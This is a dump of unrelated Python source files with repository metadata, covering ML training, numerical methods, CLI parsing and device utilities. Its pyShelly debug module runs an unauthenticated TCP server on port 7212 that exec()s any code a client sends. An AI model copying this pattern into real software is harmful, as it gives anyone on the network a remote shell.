from fairseq import utils
from . import FairseqCriterion, register_criterion
@register_criterion('cross_entropy')
class CrossEntropyCriterion(FairseqCriterion):
def __init__(self, args, task):
super().__init__(args, task)
self.task = task
def forward(self, model, sample, reduce=True):
"""Compute the loss for the given sample.
Returns a tuple with three elements:
1) the loss
2) the sample size, which is used as the denominator for the gradient
3) logging outputs to display while training
"""
# import pdb
# pdb.set_trace()
net_output = model(**sample['net_input'])
lprobs = model.get_normalized_probs(net_output, log_probs=True)
lprobs = lprobs.view(-1, lprobs.size(-1))
target = model.get_targets(sample, net_output).view(-1)
loss = F.nll_loss(lprobs, target, size_average=False, ignore_index=self.padding_idx,
reduce=reduce)
sample_size = sample['target'].size(0) if self.args.sentence_avg else sample['ntokens']
logging_output = {
'loss': utils.item(loss.data) if reduce else loss.data,
'ntokens': sample['ntokens'],
'nsentences': sample['target'].size(0),
'sample_size': sample_size,
}
        # Debug: inspect the target-language sequences produced at run time by taking the argmax of the model's output distribution
# tgt = sample['target']
# hypo = torch.max(lprobs,1)[1].reshape(*tgt.shape)
# print(tgt, hypo, sep="\n")
# tgt_str = self.task.tgt_dict.string(tgt, True, escape_unk=True)
# hypo_str = self.task.tgt_dict.string(hypo, True, escape_unk=True)
# pre_str = self.task.tgt_dict.string(sample['net_input']['prev_output_tokens'], True, escape_unk=True)
# for t,h,p in zip(tgt_str.split("\n"),hypo_str.split("\n"),pre_str.split("\n")):
# print(f"T: {t}")
# print(f"H: {h}")
# print(f"P: {p}")
# print("-"*20)
# from fairseq.sequence_generator import SequenceGenerator
# translator = SequenceGenerator(
# [model], self.task.target_dictionary, beam_size=5)
# print("-"*20, "by sequence generator", "-"*20)
# print(translator.generate_by_a_sample(sample))
# import pdb
# pdb.set_trace()
return loss, sample_size, logging_output
@staticmethod
def aggregate_logging_outputs(logging_outputs):
"""Aggregate logging outputs from data parallel training."""
loss_sum = sum(log.get('loss', 0) for log in logging_outputs)
ntokens = sum(log.get('ntokens', 0) for log in logging_outputs)
nsentences = sum(log.get('nsentences', 0) for log in logging_outputs)
sample_size = sum(log.get('sample_size', 0) for log in logging_outputs)
agg_output = {
'loss': loss_sum / sample_size / math.log(2),
'ntokens': ntokens,
'nsentences': nsentences,
'sample_size': sample_size,
}
if sample_size != ntokens:
agg_output['nll_loss'] = loss_sum / ntokens / math.log(2)
return agg_output
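The division by math.log(2) in aggregate_logging_outputs converts a natural-log (nats) loss into bits per token; a quick sanity check:
import math

loss_sum = 693.147    # summed NLL over tokens, in nats (illustrative)
sample_size = 1000    # token count used as the denominator
print(loss_sum / sample_size / math.log(2))  # ~1.0 bit per token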
| 37.276596
| 111
| 0.623002
| 3,102
| 0.87037
| 0
| 0
| 3,139
| 0.880752
| 0
| 0
| 1,676
| 0.470258
|
afb90e0689a3fd6f900cf89c2141c1e4deace929
| 365
|
py
|
Python
|
blog/models.py
|
adityabisoi/personal-portfolio
|
34e9f9dc1b78b12bf27f934ae71efa0058450c0d
|
[
"MIT"
] | 1
|
2020-02-19T09:45:28.000Z
|
2020-02-19T09:45:28.000Z
|
blog/models.py
|
adityabisoi/personal-portfolio
|
34e9f9dc1b78b12bf27f934ae71efa0058450c0d
|
[
"MIT"
] | 6
|
2021-03-19T04:39:19.000Z
|
2022-02-10T13:52:14.000Z
|
blog/models.py
|
adityabisoi/personal-portfolio
|
34e9f9dc1b78b12bf27f934ae71efa0058450c0d
|
[
"MIT"
] | null | null | null |
from django.db import models
class Blog(models.Model):
title = models.CharField(max_length=15)
date = models.DateField(auto_now_add=True)
body = models.TextField()
image = models.ImageField(upload_to='images/')
#To return title to admin page
def __str__(self):
return self.title
def limit(self):
return self.body[:100]
| 26.071429
| 50
| 0.679452
| 335
| 0.917808
| 0
| 0
| 0
| 0
| 0
| 0
| 39
| 0.106849
|
afbb87c6ab776c79d599ae4c17e47909e935b3eb
| 3,845
|
py
|
Python
|
Year-2/Computational-math/src/labs/lab_2/methods.py
|
zubrailx/University-ITMO
|
9c746ab6cfa95ecd6ff02eb23e1f49c93337ec61
|
[
"MIT"
] | 3
|
2021-10-13T05:01:37.000Z
|
2022-01-21T15:25:47.000Z
|
Year-2/Computational-math/src/labs/lab_2/methods.py
|
zubrailx/university
|
9c746ab6cfa95ecd6ff02eb23e1f49c93337ec61
|
[
"MIT"
] | null | null | null |
Year-2/Computational-math/src/labs/lab_2/methods.py
|
zubrailx/university
|
9c746ab6cfa95ecd6ff02eb23e1f49c93337ec61
|
[
"MIT"
] | null | null | null |
from copy import copy
from modules.parse import parse
from modules.equation import grad, node_flatten
from modules.matrix import Matrix
from modules.util import ProjectException
from modules.util import Color, color_string
def split_half(data: dict) -> dict:
node_root = data["equation"][0]
var_list = data["var_list"]
if (len(var_list) != 1):
raise ProjectException(color_string(Color.RED, "ERROR >> Amount of variables should be equal to 1"))
try:
range_min = data["data"]["range_min"]
range_max = data["data"]["range_max"]
iterations = data["data"]["iterations"]
except KeyError:
raise ProjectException(color_string(Color.RED,
"Key not found!(should be present range_min, range_max, iterations)"))
fval_range_min = node_root.calculate({var_list[0]: range_min})
fval_range_max = node_root.calculate({var_list[0]: range_max})
if (sum([fval_range_min > 0, fval_range_max > 0]) != 1):
return {"error": "Invalid arguments. Function values of borders are same sigh"}
for _ in range(iterations):
range_med = (range_max + range_min) / 2
fval_range_med = node_root.calculate({var_list[0]: range_med})
if (sum([fval_range_med > 0, fval_range_min > 0]) == 1):
range_max = range_med
else:
range_min = range_med
return {"result": {"range_min": range_min, "range_max": range_max}}
def tangent(data: dict) -> dict:
node = data["equation"][0]
var_list = data["var_list"]
if (len(var_list) != 1):
raise ProjectException(color_string(Color.RED, "ERROR >> Amount of variables should be equal to 1"))
try:
x_0 = data["data"]["x_0"]
iterations = data["data"]["iterations"]
except KeyError:
raise ProjectException(color_string(Color.RED, "Key not found!(should be present x_0)"))
f = node.calculate({var_list[0]: x_0})
f_ll = grad(grad(node_flatten(node, {"x": x_0}, "x")))(x_0)
if (f * f_ll <= 0):
return {"error": "Invalid arguments. Derivative'' * func <= 0. Iteration process doesn't converge"}
x_prev = x_0
for _ in range(iterations):
f_x = node.calculate({var_list[0]: x_prev})
f_x_l = grad(node_flatten(node, {"x": x_prev}, "x"))(x_prev)
x_prev -= f_x / f_x_l
return {"result": x_prev}
def simple_iteration(data: dict) -> dict:
node_list = data["parse"]
equation_list = []
    for i in range(len(node_list)):
equation_list.append(str(node_list[i]))
node_list = []
try:
iterations = data["data"]["iterations"]
x0_dict = data["data"]["x_0"]
except KeyError:
raise ProjectException(color_string(Color.RED, "Key not found!(should be present x_0)"))
x0_dict_keys = list(x0_dict.keys())
assert(len(x0_dict_keys) == len(equation_list))
for i in range(len(equation_list)):
equation_list[i] = "-1 * (" + equation_list[i] + "-" + x0_dict_keys[i] + ")"
n, v = parse.parse_expression(equation_list[i])
node_list.append(n)
matrix_phi = Matrix(len(equation_list), len(x0_dict_keys))
# check convergence
for i in range(matrix_phi.rows):
for j in range(matrix_phi.columns):
matrix_phi[i][j] = grad(node_flatten(node_list[i], x0_dict, x0_dict_keys[j]))(x0_dict[x0_dict_keys[j]])
norm = max([sum([matrix_phi[i][j] for j in range(matrix_phi.columns)]) for i in range(matrix_phi.rows)])
if (norm >= 1):
return {"error" : "This equations for those basic arguments are not convergent"}
x0_dict_prev = copy(x0_dict)
for _ in range(iterations):
for i in range(len(node_list)):
x0_dict[x0_dict_keys[i]] = node_list[i].calculate(x0_dict_prev)
x0_dict_prev = copy(x0_dict)
return {"values": x0_dict_prev}
| 40.904255
| 115
| 0.640312
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 720
| 0.187256
|
afbc104c7579cd278f56fcd197e11d8c1c44ade6
| 1,807
|
py
|
Python
|
TerraformToAnsibleInventory/args.py
|
mrlesmithjr/python-terraform-to-ansible-inventory
|
0ceb251c8fbdcf23d186f1a1d66684af1b28c86c
|
[
"MIT"
] | 5
|
2018-07-17T15:46:57.000Z
|
2020-01-18T23:54:23.000Z
|
TerraformToAnsibleInventory/args.py
|
mrlesmithjr/python-terraform-to-ansible-inventory
|
0ceb251c8fbdcf23d186f1a1d66684af1b28c86c
|
[
"MIT"
] | 11
|
2018-07-19T13:04:50.000Z
|
2019-10-22T13:38:01.000Z
|
TerraformToAnsibleInventory/args.py
|
mrlesmithjr/python-terraform-to-ansible-inventory
|
0ceb251c8fbdcf23d186f1a1d66684af1b28c86c
|
[
"MIT"
] | 4
|
2019-09-27T18:27:17.000Z
|
2021-12-22T13:41:03.000Z
|
import argparse
from _version import __version__
def parse():
"""Parse command line arguments."""
PARSER = argparse.ArgumentParser()
PARSER.add_argument('-b', '--backend',
help='Define which Terraform backend to parse',
choices=['local', 'consul'], default='local')
PARSER.add_argument('-cH', '--consulHost',
help='Define Consul host when using Consul backend')
PARSER.add_argument('-cKV', '--consulKV',
help='Define Consul KV Pair to query. Ex. Azure/Test')
PARSER.add_argument('-cP', '--consulPort',
help='Define Consul host port', default='8500')
PARSER.add_argument('-cS', '--consulScheme',
help='Define Consul connection scheme.',
choices=['http', 'https'], default='http')
PARSER.add_argument('-i', '--inventory', help='Ansible inventory',
default='./terraform_inventory.yml')
PARSER.add_argument('--logLevel', help='Define logging level output',
choices=['CRITICAL', 'ERROR', 'WARNING',
'INFO', 'DEBUG'], default='INFO')
    PARSER.add_argument('-t', '--tfstate', help='Terraform tfstate file',
default='./terraform.tfstate')
PARSER.add_argument('-v', '--version', action='version',
version='%(prog)s {version}'.format(version=__version__))
ARGS = PARSER.parse_args()
if ARGS.backend == 'consul' and ARGS.consulHost is None:
PARSER.error('Consul host is required when using Consul backend.')
if ARGS.backend == 'consul' and ARGS.consulKV is None:
PARSER.error('Consul KV pair is required when using Consul backend')
return ARGS
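The conditional-requirement pattern above (consulHost only mandatory for the consul backend) in isolation, runnable without the _version import:
import argparse

parser = argparse.ArgumentParser()
parser.add_argument('-b', '--backend', choices=['local', 'consul'], default='local')
parser.add_argument('-cH', '--consulHost')
args = parser.parse_args(['-b', 'consul', '-cH', 'consul.example.com'])
# parser.error() prints usage and exits non-zero, which is why parse() uses it.
if args.backend == 'consul' and args.consulHost is None:
    parser.error('Consul host is required when using Consul backend.')
print(args.backend, args.consulHost)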
| 51.628571
| 81
| 0.58052
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 744
| 0.411732
|
afbcc11a19deb6b6ae32cfc779f94a2a3949f37d
| 549
|
py
|
Python
|
wifi_radio/lockable_mpdclient.py
|
thomasvamos/wifi_radio
|
54a04b37cfbada82074af439a7b0ee12cedf3512
|
[
"MIT"
] | null | null | null |
wifi_radio/lockable_mpdclient.py
|
thomasvamos/wifi_radio
|
54a04b37cfbada82074af439a7b0ee12cedf3512
|
[
"MIT"
] | null | null | null |
wifi_radio/lockable_mpdclient.py
|
thomasvamos/wifi_radio
|
54a04b37cfbada82074af439a7b0ee12cedf3512
|
[
"MIT"
] | null | null | null |
'''
Wrapper for a lockable MPD client
'''
from threading import Lock
from mpd import MPDClient
class LockableMPDClient(MPDClient):
def __init__(self, use_unicode=False):
super(LockableMPDClient, self).__init__()
self.use_unicode = use_unicode
self._lock = Lock()
def acquire(self):
self._lock.acquire()
def release(self):
self._lock.release()
def __enter__(self):
self.acquire()
def __exit__(self, type, value, traceback):
self.release()
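A hedged usage sketch; it assumes a reachable MPD server and the standard python-mpd connect(host, port) call:
client = LockableMPDClient()
client.connect('localhost', 6600)  # assumes an MPD server is listening here
with client:                       # acquires the lock, releases it on exit
    status = client.status()
print(status.get('state'))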
| 26.142857
| 49
| 0.668488
| 418
| 0.761384
| 0
| 0
| 0
| 0
| 0
| 0
| 41
| 0.074681
|
afbcd4f337d7fb85d3b0e527567a1d3d85e5d0ed
| 1,928
|
py
|
Python
|
test.py
|
raveendezoysa/American-Sign-Language-to-Text-Based-Translator
|
0e0d3bea9912c87c51f00728742dc67cd85b7e66
|
[
"MIT"
] | null | null | null |
test.py
|
raveendezoysa/American-Sign-Language-to-Text-Based-Translator
|
0e0d3bea9912c87c51f00728742dc67cd85b7e66
|
[
"MIT"
] | null | null | null |
test.py
|
raveendezoysa/American-Sign-Language-to-Text-Based-Translator
|
0e0d3bea9912c87c51f00728742dc67cd85b7e66
|
[
"MIT"
] | null | null | null |
# importing libraries
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D
from keras.layers import Activation, Dropout, Flatten, Dense
from keras import backend as K
img_width, img_height = 224, 224
train_data_dir = 'v_data/train'
validation_data_dir = 'v_data/test'
nb_train_samples = 400
nb_validation_samples = 100
epochs = 10
batch_size = 16
if K.image_data_format() == 'channels_first':
input_shape = (3, img_width, img_height)
else:
input_shape = (img_width, img_height, 3)
model = Sequential()
model.add(Conv2D(32, (2, 2), input_shape = input_shape))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size =(2, 2)))
model.add(Conv2D(32, (2, 2)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size =(2, 2)))
model.add(Conv2D(64, (2, 2)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size =(2, 2)))
model.add(Flatten())
model.add(Dense(64))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss='binary_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
train_datagen = ImageDataGenerator(
rescale=1. / 255,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True)
test_datagen = ImageDataGenerator(rescale=1. / 255)
train_generator = train_datagen.flow_from_directory(train_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size, class_mode='binary')
validation_generator = test_datagen.flow_from_directory(
validation_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size, class_mode ='binary')
model.fit_generator(train_generator,
steps_per_epoch=nb_train_samples // batch_size,
epochs=epochs, validation_data=validation_generator,
validation_steps=nb_validation_samples // batch_size)
model.save_weights('model_saved.h5')
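A follow-on sketch for reusing the trained weights: the script above leaves model, img_width and img_height in scope, so we can reload the checkpoint and classify one image (the image path is a placeholder).
from keras.preprocessing.image import load_img, img_to_array
import numpy as np

model.load_weights('model_saved.h5')          # checkpoint written above
img = load_img('v_data/test/sample.jpg',      # placeholder path
               target_size=(img_width, img_height))
x = np.expand_dims(img_to_array(img) / 255.0, axis=0)  # match rescale=1./255
print('positive class probability:', float(model.predict(x)[0][0]))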
| 27.542857
| 67
| 0.761411
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 169
| 0.087656
|
afbdd176b769632287834f6d6008afe844162c2f
| 245
|
py
|
Python
|
other/simpleOSC/sendbundle.py
|
neonkingfr/VizBench
|
e41f559cb6e761d717f2f5b202482d5d8dacd2d8
|
[
"MIT"
] | 7
|
2015-01-05T06:32:49.000Z
|
2020-10-30T19:29:07.000Z
|
other/simpleOSC/sendbundle.py
|
neonkingfr/VizBench
|
e41f559cb6e761d717f2f5b202482d5d8dacd2d8
|
[
"MIT"
] | null | null | null |
other/simpleOSC/sendbundle.py
|
neonkingfr/VizBench
|
e41f559cb6e761d717f2f5b202482d5d8dacd2d8
|
[
"MIT"
] | 4
|
2016-03-09T22:29:26.000Z
|
2021-04-07T13:52:28.000Z
|
import osc
osc.init()
# create and send a bundle
bundle = osc.createBundle()
osc.appendToBundle(bundle, "/test/bndlprt1", [1, 2.2, "333"])
osc.appendToBundle(bundle, "/test/bndlprt2", [4, 5.5, 6])
osc.sendBundle(bundle, "127.0.0.1", 9999)
| 24.5
| 61
| 0.677551
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 74
| 0.302041
|
afbe04768d0e6a472f75c12cbd235fcaf4b5e777
| 2,113
|
py
|
Python
|
intersimple-expert-rollout-setobs2.py
|
sisl/InteractionImitation
|
9c9ee8f21b53e71bbca86b0b79c6e6d913a20567
|
[
"MIT"
] | 2
|
2022-03-13T19:43:08.000Z
|
2022-03-14T03:19:33.000Z
|
intersimple-expert-rollout-setobs2.py
|
sisl/InteractionImitation
|
9c9ee8f21b53e71bbca86b0b79c6e6d913a20567
|
[
"MIT"
] | null | null | null |
intersimple-expert-rollout-setobs2.py
|
sisl/InteractionImitation
|
9c9ee8f21b53e71bbca86b0b79c6e6d913a20567
|
[
"MIT"
] | null | null | null |
import torch
import functools
from src.core.sampling import rollout_sb3
from intersim.envs import IntersimpleLidarFlatIncrementingAgent
from intersim.envs.intersimple import speed_reward
from intersim.expert import NormalizedIntersimpleExpert
from src.util.wrappers import CollisionPenaltyWrapper, Setobs
import numpy as np
from gym.wrappers import TransformObservation
obs_min = np.array([
[-1000, -1000, 0, -np.pi, -1e-1, 0.],
[0, -np.pi, -20, -20, -np.pi, -1e-1],
[0, -np.pi, -20, -20, -np.pi, -1e-1],
[0, -np.pi, -20, -20, -np.pi, -1e-1],
[0, -np.pi, -20, -20, -np.pi, -1e-1],
[0, -np.pi, -20, -20, -np.pi, -1e-1],
]).reshape(-1)
obs_max = np.array([
[1000, 1000, 20, np.pi, 1e-1, 0.],
[50, np.pi, 20, 20, np.pi, 1e-1],
[50, np.pi, 20, 20, np.pi, 1e-1],
[50, np.pi, 20, 20, np.pi, 1e-1],
[50, np.pi, 20, 20, np.pi, 1e-1],
[50, np.pi, 20, 20, np.pi, 1e-1],
]).reshape(-1)
def main(track:int, loc:int=0):
env = IntersimpleLidarFlatIncrementingAgent(
loc=loc,
track=track,
n_rays=5,
reward=functools.partial(
speed_reward,
collision_penalty=0
),
)
policy = NormalizedIntersimpleExpert(env, mu=0.001)
env = Setobs(TransformObservation(
CollisionPenaltyWrapper(
env,
collision_distance=6, collision_penalty=100
), lambda obs: (obs - obs_min) / (obs_max - obs_min + 1e-10)
))
print(env.nv, 'vehicles')
expert_data = rollout_sb3(env, policy, n_episodes=150, max_steps_per_episode=200)
states, actions, rewards, dones = expert_data
print(f'Expert mean episode length {(~dones).sum() / states.shape[0]}')
print(f'Expert mean reward per episode {rewards[~dones].sum() / states.shape[0]}')
print(f'Observation mean', states[~dones].mean(0))
print(f'Observation std', states[~dones].std(0))
torch.save(expert_data, f'intersimple-expert-data-setobs2-loc{loc}-track{track}.pt')
def loop(tracks:list=[0]):
for track in tracks:
main(track)
if __name__=='__main__':
import fire
fire.Fire(loop)
| 32.507692
| 88
| 0.630857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 255
| 0.120681
|
afbe9673b618fa0388c83b7abcd87db09f9c7dda
| 2,840
|
py
|
Python
|
FeatureTransformation/UserInputFeatureScalling.py
|
Himanshu14k/AdultIncomePrediction_Project
|
522f170111c5e6e45ef1e26ef21f86f4ea3a8dcc
|
[
"MIT"
] | 2
|
2021-09-06T08:31:46.000Z
|
2021-10-30T12:53:21.000Z
|
FeatureTransformation/UserInputFeatureScalling.py
|
Himanshu14k/AdultIncomePrediction_Project
|
522f170111c5e6e45ef1e26ef21f86f4ea3a8dcc
|
[
"MIT"
] | 1
|
2021-09-07T13:53:26.000Z
|
2021-09-07T13:53:26.000Z
|
FeatureTransformation/UserInputFeatureScalling.py
|
Himanshu14k/AdultIncomePrediction_Project
|
522f170111c5e6e45ef1e26ef21f86f4ea3a8dcc
|
[
"MIT"
] | 2
|
2021-09-13T17:20:56.000Z
|
2021-11-21T16:05:16.000Z
|
from joblib import load
from pandas import DataFrame
import pickle
class FeatureScaling:
def __init__(self, user_input, logger_obj, file_obj):
try:
self.logger_obj = logger_obj
self.file_obj = file_obj
self.logger_obj.log("INFO", 'Different user input value assign process started')
self.user_input = user_input
self.Education = self.user_input['Education']
self.logger_obj.log("INFO", 'stated done')
self.Workclass = self.user_input['Workclass']
self.Age = self.user_input['Age']
self.Martial_Status = self.user_input['Martial_Status']
self.Occupation = self.user_input['Occupation']
self.Relationship = self.user_input['Relationship']
self.Race = self.user_input['Race']
self.Sex = self.user_input['Sex']
self.Final_Weight = self.user_input['Final_Weight']
self.Capital_Gain = self.user_input['Capital_Gain']
self.Capital_Loss = self.user_input['Capital_Loss']
self.Hours_Per_Week = self.user_input['Hours_Per_Week']
self.Country = self.user_input['Country']
self.X = [[self.Sex, self.Age, self.Final_Weight,
self.Education, self.Capital_Gain, self.Capital_Loss,
self.Hours_Per_Week, self.Workclass, self.Martial_Status, self.Occupation,
self.Relationship, self.Race, self.Country]]
self.logger_obj.log("INFO", 'Different user input value assign process Finished')
except Exception as e:
self.logger_obj.log('INFO',"Exception Occurred during variable creation of user input to store scale data in dictionary format! Exception Message: " + str(e))
self.logger_obj.log('INFO',"Process to create variable and store user input in that variable failed.")
def Scaling(self):
"""
        :DESC: This function takes the data provided by the user and performs feature scaling.
        It uses the fitted scaler stored in the scale.pickle file.
:return: Sends Data to perform model testing.
"""
try:
self.logger_obj.log("INFO", 'Feature Scaling process started')
self.X = DataFrame(self.X)
            with open("FeatureTransformation/scale.pickle", "rb") as scale_file:
                sc = pickle.load(scale_file)
            self.X.iloc[:, 1:] = sc.transform(self.X.iloc[:, 1:])
self.logger_obj.log("INFO", 'Feature scaling process successfully executed!')
return self.X
except Exception as e:
self.logger_obj.log('INFO',"Exception Occurred during Process of Feature Scaling! Exception Message: " + str(e))
self.logger_obj.log('INFO',"Process of Feature scaling Failed. Exited from Scaling function of FeatureScalling class")
| 53.584906
| 171
| 0.633099
| 2,771
| 0.975704
| 0
| 0
| 0
| 0
| 0
| 0
| 1,023
| 0.360211
|
afbeec327d96ab2c12353a666a3a203a3a3bf18e
| 4,073
|
py
|
Python
|
pyShelly/debug.py
|
rfvermut/pyShelly
|
c2f27ef14d1eaf94c403858a898a919d0005d639
|
[
"MIT"
] | 39
|
2019-03-19T11:09:26.000Z
|
2022-03-19T12:44:47.000Z
|
pyShelly/debug.py
|
rfvermut/pyShelly
|
c2f27ef14d1eaf94c403858a898a919d0005d639
|
[
"MIT"
] | 34
|
2019-05-21T18:41:18.000Z
|
2022-03-27T07:30:49.000Z
|
pyShelly/debug.py
|
rfvermut/pyShelly
|
c2f27ef14d1eaf94c403858a898a919d0005d639
|
[
"MIT"
] | 42
|
2019-03-28T15:18:59.000Z
|
2021-12-27T19:16:44.000Z
|
import socket
import threading
import json
import sys
from io import StringIO
from .loop import Loop
from .const import (
LOGGER
)
class Debug_connection(Loop):
def __init__(self, parent, connection, client_address):
super(Debug_connection, self).__init__("Debug connection", parent._root)
self._debug_server = parent
self._connection = connection
self._client_address = client_address
self.state = 0
self.cmd = ''
self._locals = {'root':self._debug_server._root}
self._globals = {}
self.start_loop()
def loop_stopped(self):
try:
self._connection.close()
except:
pass
try:
            self._debug_server._connections.remove(self)
except:
pass
def loop(self):
if self.state == 0:
self._connection.send(b"> ")
self.state = 1
if self.state == 1:
try:
char = self._connection.recv(1).decode()
            except socket.timeout:
                # no data this cycle; return so 'char' is never read unbound
                return
            except:
                LOGGER.exception("Error receiving debug command")
                self.stop_loop()
                return
            if char in ['\r', '\n']:
if not self.cmd:
return
elif self.cmd == 'exit':
self.stop_loop()
else:
old_stdout = sys.stdout
redirected_output = sys.stdout = StringIO()
try:
exec(self.cmd, self._globals, self._locals)
res = redirected_output.getvalue()
self._connection.send(res.encode() + b"\r\n")
except Exception as ex:
self._connection.send(str(ex).encode() + b"\r\n")
finally:
sys.stdout = old_stdout
self.cmd = ''
self.state = 0
else:
self.cmd += char
class Debug_server(Loop):
def __init__(self, root):
super(Debug_server, self).__init__("Debug server", root)
self._root = root
self._socket = None
self._connections = []
self.start_loop()
def loop_started(self):
self._init_socket()
def _init_socket(self):
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((self._root.bind_ip, 7212))
sock.listen(1)
self._socket = sock
def loop(self):
# Wait for a connection
connection, client_address = self._socket.accept()
conn = Debug_connection(self, connection, client_address)
self._connections.append(conn)
def loop_stopped(self):
if self._socket:
self._socket.close()
# import socket
# import sys
# def main():
# host = ""
# port = 50000
# backlog = 5
# size = 1024
# sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# sock.bind((host, port))
# sock.listen(backlog)
# while True:
# client, address = sock.accept()
# test.log("Client connected.")
# while True:
# data = client.recv(size).rstrip()
# if not data:
# continue
# test.log("Received command: %s" % data)
# if data == "disconnect":
# test.log("Client disconnected.")
# client.send(data)
# client.close()
# break
# if data == "exit":
# test.log("Client asked server to quit")
# client.send(data)
# client.close()
# return
# test.log("Executing command: %s" % data)
# try:
# exec(data)
# except Exception, err:
# test.log("Error occured while executing command: %s" % (
# data), str(err))
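A minimal client sketch for the server above (assumes it is running locally on port 7212; the command string is arbitrary Python, since the server passes it to exec):
import socket

conn = socket.create_connection(('127.0.0.1', 7212))
print(conn.recv(2).decode())     # the '> ' prompt
conn.send(b'print(root)\n')      # executed server-side via exec()
print(conn.recv(4096).decode())  # captured stdout of the command
conn.send(b'exit\n')             # asks the connection loop to stop
conn.close()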
| 30.62406
| 94
| 0.499386
| 2,783
| 0.68328
| 0
| 0
| 0
| 0
| 0
| 0
| 1,257
| 0.308618
|
afc0461dd64d75f8650665858aa646a390a84868
| 972
|
py
|
Python
|
setup.py
|
AGOberprieler/allcopol
|
7fd3d8ad7c9ff8410155691d8a37fdbea7783c81
|
[
"MIT"
] | 1
|
2020-10-19T08:22:50.000Z
|
2020-10-19T08:22:50.000Z
|
setup.py
|
AGOberprieler/allcopol
|
7fd3d8ad7c9ff8410155691d8a37fdbea7783c81
|
[
"MIT"
] | null | null | null |
setup.py
|
AGOberprieler/allcopol
|
7fd3d8ad7c9ff8410155691d8a37fdbea7783c81
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
with open("README.md", "r") as f:
long_description = f.read()
setup(name = "allcopol",
version = "0.1.1",
description = "AllCoPol: Inferring allele co-ancestry in polyploids",
long_description = long_description,
long_description_content_type = "text/markdown",
url = "https://github.com/AGOberprieler/allcopol",
author = "Ulrich Lautenschlager",
author_email = "ulrich.lautenschlager@ur.de",
license = "MIT",
packages = find_packages(),
install_requires = [
"argparse", "biopython", "configargparse", "numpy", "scipy"
],
entry_points = {
"console_scripts": [
"allcopol=allcopol.allcopol:main",
"align_clusters=allcopol.align_clusters:main",
"create_indfile=allcopol.create_indfile:main",
"relabel_trees=allcopol.relabel_trees:main",
],
},
zip_safe = False,
python_requires = ">=3.5",
)
| 30.375
| 73
| 0.644033
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 441
| 0.453704
|
afc04d85e4ad399b752a6a1b506501312782c229
| 2,686
|
py
|
Python
|
genalg/sample.py
|
davidkant/thresholds-ga
|
78988bb1bfa1c1eb32afc24edf59e5fde2f1c212
|
[
"Apache-2.0"
] | null | null | null |
genalg/sample.py
|
davidkant/thresholds-ga
|
78988bb1bfa1c1eb32afc24edf59e5fde2f1c212
|
[
"Apache-2.0"
] | 9
|
2018-05-06T18:55:29.000Z
|
2018-05-06T19:13:33.000Z
|
genalg/sample.py
|
davidkant/thresholds-ga
|
78988bb1bfa1c1eb32afc24edf59e5fde2f1c212
|
[
"Apache-2.0"
] | null | null | null |
import spec
import sonicfeatures
import display
import random
import os
class Sample:
"""Keep track of samples and their stuff."""
def __init__(self, genotype, gen=0, index=0, parents=None, fitness_func=None):
self.genotype = genotype
        self.phenotype = None
self.fitness_func = fitness_func
self.gen = gen
self.index = index
self.parents = parents
self.mutant = False
self.score = None
self.rid = None
@classmethod
def random_sample(cls, index, randorams, spec, fitness_func=None):
"""A random Sample."""
# return cls([spec.map_spec(param, random.random()) for i in range(4) for param in randorams], index)
random_sample = cls([spec.map_spec(param, random.random()) for i in range(4) for param in randorams],
gen=0,
index=index,
parents=None,
fitness_func=fitness_func)
random_sample.phenotype = random_sample.to_phenotype(randorams, spec)
return random_sample
def to_phenotype(self, randorams, spec):
"""Map genotype [0,1] to through param spec."""
return [spec.map_spec(param, gene) for gene,param in zip(self.genotype, randorams)]
def render(self, renderer, filename='sample', verbose=True):
"""Ask rs server to render me."""
renderer.render(self, filename=filename, verbose=verbose)
return self
def render_and_do(self, renderer, do_func, func_args, filename='sample', verbose=True):
"""Render and do do_func upon completion."""
renderer.render_and_do(self, do_func, func_args, filename, verbose)
return self
def render_and_score(self, renderer, filename='sample', verbose=True):
"""Render and score fitness."""
renderer.render_and_score(self, filename, verbose)
return self
def fitness(self, renderer, deleteme=True):
"""Evalute fitness. Assume we are rendered."""
# print('{0}evaluating fitness: {1}'.format(NW_THRD, self.rid))
filename = '{0}/{1}.wav'.format(renderer.render_params['foldername'], self.filename)
fitness = self.fitness_func(filename)
print('{0}done evaluating fitness: {1}, index: {3} = {2}'.format(display.NOTIFY, self.rid, fitness, self.index))
# delete file for space
if deleteme: os.system('rm "{0}"'.format(filename))
# do this last cuz triggers stuff
self.score = fitness
return self
def __repr__(self):
return '<Sample(gen: {0.gen!r}, index: {0.index!r}, rid: {0.rid!r}, score: {0.score!r})>'.format(self)
| 40.089552
| 120
| 0.624348
| 2,611
| 0.972077
| 0
| 0
| 616
| 0.229337
| 0
| 0
| 680
| 0.253165
|
afc156258025b1022c60a512cb7371bc599d1647
| 1,709
|
py
|
Python
|
11/VMWriter.py
|
aadityarautela/nand2tetris
|
64768087ae5f6903beeb17a01492d68d7b2354f6
|
[
"MIT"
] | null | null | null |
11/VMWriter.py
|
aadityarautela/nand2tetris
|
64768087ae5f6903beeb17a01492d68d7b2354f6
|
[
"MIT"
] | null | null | null |
11/VMWriter.py
|
aadityarautela/nand2tetris
|
64768087ae5f6903beeb17a01492d68d7b2354f6
|
[
"MIT"
] | null | null | null |
class VMWriter(object):
def __init__(self,fname):
self.outfile = open(fname, 'w')
def close(self):
self.outfile.close()
def write_cmd(self, cmd, arg1 = "", arg2 = ""):
self.outfile.write(cmd + " " + str(arg1) + " " + str(arg2) + "\n")
def write_push(self,seg,index):
self.write_cmd("push",seg,index)
